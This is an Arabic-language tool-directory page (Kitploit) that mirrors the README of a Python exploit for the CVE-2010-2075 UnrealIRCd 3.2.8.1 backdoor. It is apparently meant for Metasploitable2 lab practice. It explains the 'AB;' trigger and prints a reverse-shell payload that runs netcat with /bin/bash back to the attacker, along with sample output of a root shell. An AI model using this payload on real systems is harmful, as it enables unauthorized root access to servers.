Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2010-2075 — استغلال الباب الخلفي في UnrealIRCd 3.2.8.1 — صدفة عكسية عبر AB؛ مُشغِّل، مبني من الصفر بلغة Python باستخدام raw sockets. بدون Metasploit. | Kitploit
أدوات/GitHubGitHub/rushikesh-a-bhujbal/cve-2010-2075
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقأمن سلسلة التوريدالتعلم والتعليمالفريق الأحمرتطوير الحمولات
مختبرات وتدريب عملي
GitHubrushikesh-a-bhujbal/cve-2010-2075

CVE-2010-2075

استغلال الباب الخلفي في UnrealIRCd 3.2.8.1 — صدفة عكسية عبر AB؛ مُشغِّل، مبني من الصفر بلغة Python باستخدام raw sockets. بدون Metasploit.

عرض المستودع
1منذ 10س 21دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2010-2075 — استغلال الباب الخلفي في UnrealIRCd 3.2.8.1

Python Platform Target License


نظرة عامة

UnrealIRCd هو خادم IRC (Internet Relay Chat) مفتوح المصدر — وهو بروتوكول يسمح للمستخدمين بالتواصل في الوقت الفعلي عبر الشبكة، على غرار منصات الدردشة المبكرة.

في الفترة 2009–2010، تم اكتشاف أن UnrealIRCd 3.2.8.1 الموزَّع عبر مرايا التنزيل الرسمية قد تم اختراقه. حيث استبدل المهاجم الشيفرة المصدرية الشرعية بنسخة مزودة بباب خلفي تحتوي على مُشغِّل مخفي لتنفيذ الأوامر.

كان هذا هجوم سلسلة التوريد — مماثل في طبيعته لـ CVE-2011-2523 (vsftpd 2.3.4). تم استبدال البرنامج الشرعي بنسخة معدَّلة بشكل خبيث قبل أن يقوم المستخدمون بتنزيله.


كيف يعمل الباب الخلفي

يراقب الباب الخلفي جميع البيانات الواردة على المنفذ 6667. إذا بدأ أي إدخال بالسلسلة AB;، يتم تمرير كل ما يليها مباشرةً إلى — متجاوزًا بذلك كل منطق IRC والمصادقة وفحوصات التسجيل بالكامل.

system()

يُفعَّل المُشغِّل خلال مرحلة تهيئة الاتصال، قبل أن يسجّل خادم IRC العميل حتى. لا حاجة إلى NICK، ولا USER، ولا مصادقة.

مسار الهجوم:

root@kitploit:~
Attacker (Kali)                    Target (Metasploitable2)
                                   
1. s1 connects to port 6667   
   NICK + USER handshake      →    Server sends full banner
   Read banner, check version  
   Confirm Unreal3.2.8.1      
                                   
2. Open listener on port 4444  
   (waiting for incoming shell)
                                   
3. s2 connects to port 6667   →    AB; nc -e /bin/bash KALI_IP 4444
                               →    system() executes immediately
                               →    netcat spawns bash, connects back
                                   
4. listener.accept()          ←    Incoming root shell connection
   Interactive root shell      

الصدفة العكسية مقابل صدفة الربط

يستخدم هذا الاستغلال صدفة عكسية — حيث يتصل الهدف مرة أخرى بالمهاجم، بدلاً من أن يتصل المهاجم بمنفذ على الهدف.

النوعالاتجاهيُستخدم في
صدفة الربطالمهاجم → الهدفCVE-2011-2523 (vsftpd)
الصدفة العكسيةالهدف → المهاجمCVE-2010-2075 (UnrealIRCd)

تتجاوز الصدفات العكسية قواعد جدار الحماية الواردة — فنادرًا ما يتم حظر الاتصالات الصادرة من الهدف.


المتطلبات

  • Python 3.x
  • لا توجد مكتبات خارجية — المكتبة القياسية فقط
  • netcat مثبَّت على الهدف (موجود افتراضيًا على Metasploitable2)
  • الهدف: Metasploitable2 يعمل عليه UnrealIRCd 3.2.8.1

الاستخدام

root@kitploit:~
git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075

حرِّر main.py واضبط:

root@kitploit:~
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"

شغِّل:

root@kitploit:~
python3 main.py

مثال على المخرجات:

root@kitploit:~
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit

معالجة الأخطاء

السيناريوالسلوك
المنفذ 6667 مغلقيطبع "Port Closed"، ويخرج بشكل نظيف
إصدار خاطئيطبع "Not vulnerable"، ويخرج بشكل نظيف
الهدف لا يتصل مرة أخرىينتظر listener.accept() (أضف مهلة زمنية إذا لزم الأمر)
الأمر لا ينتج مخرجاتتنتهي مهلة recv() بصمت، ويعود إلى الموجِّه

الفرق الجوهري عن CVE-2011-2523

CVE-2011-2523 (vsftpd)CVE-2010-2075 (UnrealIRCd)
البروتوكولFTP (المنفذ 21)IRC (المنفذ 6667)
المُشغِّل:) في اسم المستخدمبادئة AB; على أي إدخال
نوع الصدفةصدفة الربط (المنفذ 6200)صدفة عكسية (منفذ المهاجم)
الاتصالات2 صادرة1 صادرة + 1 واردة

تم الاختبار ضد

  • Metasploitable2 (جهاز افتراضي معرَّض للثغرات عن قصد)
  • UnrealIRCd 3.2.8.1
  • Linux metasploitable 2.6.24-16-server

إخلاء المسؤولية القانونية

تم تطوير هذا الاستغلال بغرض تعليمي بحت ولأغراض البحث الأمني المصرَّح به فقط.

تم بناؤه واختباره حصريًا ضد جهاز افتراضي Metasploitable2 محلي في بيئة مختبرية معزولة تمامًا.

لا تستخدم هذا ضد أي نظام لا تملكه أو لا تملك إذنًا كتابيًا صريحًا باختباره. الاستخدام غير المصرَّح به غير قانوني بموجب قانون الغش وإساءة استخدام الحاسوب (CFAA) والقوانين المكافئة في جميع أنحاء العالم.

لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذه الشيفرة.


المراجع

  • سجل CVE: https://www.cve.org/CVERecord?id=CVE-2010-2075
  • مدخل NVD: https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • الإفصاح الأصلي: https://www.exploit-db.com/exploits/13853
  • Metasploitable2: https://sourceforge.net/projects/metasploitable/

المؤلف

Rushikesh Bhujbal
البحث الأمني وتطوير الاستغلالات
GitHub

تنزيل الأداة